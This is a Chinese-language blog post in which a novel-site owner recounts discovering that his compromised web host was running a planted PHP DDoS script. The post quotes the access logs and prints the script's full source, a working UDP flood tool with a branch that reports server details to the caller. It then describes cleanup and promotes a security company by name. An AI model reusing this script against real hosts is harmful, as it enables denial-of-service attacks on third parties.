我的windows2003網站主機，前幾天一直都非常的穩定，可是昨天主機商竟然說我主機向外發包，流量特別的大，導致機房的整個網絡及其不穩定，暫停了我的主機，導致我的小說站，流量一直的下滑，收入也沒有了，欲哭無淚啊。
 

        跟機房那面技術也交談了好久，才告訴我實情，是因為我主機上的一個小說網站對外發包才導致主機被機房封掉，技術建議我查看下網站的iis日誌，機房暫時把我的80端口封了，遠程還是可以進的，進主機看了昨天的iis日誌，發現了許多不同的post日誌，代碼如下：

221.7.233.92 - - [17/Aug/2012:10:44:28 +0800] "GET /phzLtoxn.php?host=64.32.26.114&port=80&time=60 HTTP/1.1" 200 1654 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)" xh029.com text/html "/usr/home/hmu112047/htdocs/index.php"
221.7.233.92 - - [17/Aug/2012:10:44:28 +0800] "GET /phzLtoxn.php?host=175.41.24.106&port=80&time=60 HTTP/1.1" 200 1654 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)" xh029.com text/html "/usr/home/hmu112047/htdocs/index.php"
221.7.233.92 - - [17/Aug/2012:10:44:32 +0800] "GET /phzLtoxn.php?host=121.10.107.53&port=80&time=60 HTTP/1.1" 200 1654 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)" xh029.com text/html "/usr/home/hmu112047/htdocs/index.php"
221.7.233.92 - - [17/Aug/2012:10:44:32 +0800] "GET /phzLtoxn.php?host=108.162.203.74&port=80&time=60 HTTP/1.1" 200 1654 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)" xh029.com text/html "/usr/home/hmu112047/htdocs/index.php"
221.7.233.92 - - [17/Aug/2012:10:44:33 +0800] "GET /phzLtoxn.php?host=69.197.24.66&port=80&time=60 HTTP/1.1" 200 1654 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)" xh029.com text/html "/usr/home/hmu112047/htdocs/index.php"
221.7.233.92 - - [17/Aug/2012:10:44:39 +0800] "GET /phzLtoxn.php?host=220.250.64.18&port=80&time=60 HTTP/1.1" 200 1654 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)" xh029.com text/html "/usr/home/hmu112047/htdocs/index.php"
221.7.233.92 - - [17/Aug/2012:10:44:50 +0800] "GET /phzLtoxn.php?host=118.123.229.13&port=80&time=60 HTTP/1.1" 200 1654 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)" xh029.com text/html "/usr/home/hmu112047/htdocs/index.php"
221.7.233.92 - - [17/Aug/2012:10:44:58 +0800] "GET /phzLtoxn.php?host=174.34.155.187&port=80&time=60 HTTP/1.1" 200 1654 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)" xh029.com text/html "/usr/home/hmu112047/htdocs/index.php"
66.249.66.214 - - [17/Aug/2012:10:45:07 +0800] "GET /department/bibing/bichuxue/20120531/311.html HTTP/1.1" 200 45769 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" xh029.com text/html "/usr/home/hmu112047/htdocs/index.php"

我也不太懂這樣的日誌，就找了幾個做網站方面的朋友，幫我分析了一下，說是網站下的phzLtoxn.php文件在向外發包，其中host就是流量對外發包的ip，Post是端口，time是時間，上面的日誌中很明顯的發現我的網站流量，在向其他主機的80端口發送流量，朋友說這種攻擊叫流量攻擊，也叫DDOS。  說白了，也就是人家的肉雞。

大體的情況瞭解了，解決就有了辦法，既然是phzLtoxn.php這個文件在搞怪。那就超phzLtoxn.php這個文件開炮。進主機打開網站根目錄，找了這個文件，打開後發現裡面的代碼都是攻擊性的代碼，代碼如下：

<?php

set_time_limit(999999);

$host = $_GET['host'];

$port = $_GET['port'];

$exec_time = $_GET['time'];

$Sendlen = 65535;

$packets = 0;

ignore_user_abort(True);

if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){

        if (StrLen($_GET['rat'])<>0){

                echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];

                exit;

            }

        echo "Warning to: opening";

        exit;

    }

for($i=0;$i<$Sendlen;$i++){

        $out .= "A";

    }

$max_time = time()+$exec_time;

while(1){

    $packets++;

    if(time() > $max_time){

        break;

    }

    $fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);

        if($fp){

            fwrite($fp, $out);

            fclose($fp);

    }

}

echo "Send Host：$hostport<br><br>";

echo "Send Flow：$packets * ($Sendlen/1024=" . round($Sendlen/1024, 2) . ")kb / 1024 = " . round($packets*$Sendlen/1024/1024, 2) . " mb<br><br>";

echo "Send Rate：" . round($packets/$exec_time, 2) . " packs/s；" . round($packets/$exec_time*$Sendlen/1024/1024, 2) . " mb/s";

?>  

用360掃瞄了一下，發現這個文件是腳本木馬。我這才明白過來，原來我的網站是被人上傳了木馬，也就是說網站被人入侵了。在網上找了點文章瞭解到，網站被上傳木馬大多數是因為網站程序有漏洞，和主機安全有關係的。
 

於是在網上搜索到了一個叫esafe.tw網站木馬檢測的工具，把網站的源程序放到了工具裡掃瞄，發現了有5個腳本木馬，都是高危型的木馬，點了一下清除，木馬統統被殺。本地調試打開網站，網站一切正常了。  通知了機房，主機正常開通。

本以為可以好好睡一覺了，沒想到半夜的時候來了監控寶的短信，說我的網站暫時無法訪問。當時我真的頭大了，我明明把木馬清除了，怎麼還出現問題啊。  用esafe.tw木馬工具又掃瞄了一下，發現又出來了2個木馬，當我點擊刪除的時候，我也明白了，木馬刪來刪去的，問題還是會存在，最主要的是要把網站被上傳木馬的這個根本原因，解決掉，才能真正的解決問題。
 

分析了一下，一個是我網站用的是dedecms的系統，再一個就是主機的安全問題，前幾天發現了主機不太正常。W3wp.exe這個進程佔用了%75的內存。網站打開也非常的緩慢。Ping的時候時不時的丟包，肯定是主機也出現問題，可是對於主機安全我也不懂，看著網站流量一天一天的下滑，損失真的太大了，我這幾年的努力啊。沒辦法咨詢了幾個資深小說行業的朋友，問有沒有解決的辦法，他們建議我找一家專業做安全方面的公司。 他們也都是這樣解決的，最快的解決辦法，也是把損失降到最低的辦法。他們也一致推薦了esafe.tw這家安全公司。找了他們，做了網站安全和主機安全，以及代碼的審計，漏洞修補，問題才得以解決，網站也恢復了正常，監視了幾天也沒在發生網站向外發包的特徵，主機也很正常了。
 

寫了這麼多，最主要的還是經歷的過程。在解決問題的過程中，也明白了許多的道理，安全這個問題不能小看了，出了一點點安全問題，得到的損失也將會很大，也由衷的希望我的經歷能幫到更多需要幫助的人，幫助別人也是在幫助我自己。